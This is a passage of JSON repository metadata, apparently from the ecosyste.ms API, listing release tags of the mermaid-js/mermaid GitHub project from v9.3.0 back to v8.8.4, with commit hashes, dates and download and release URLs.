itories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/ta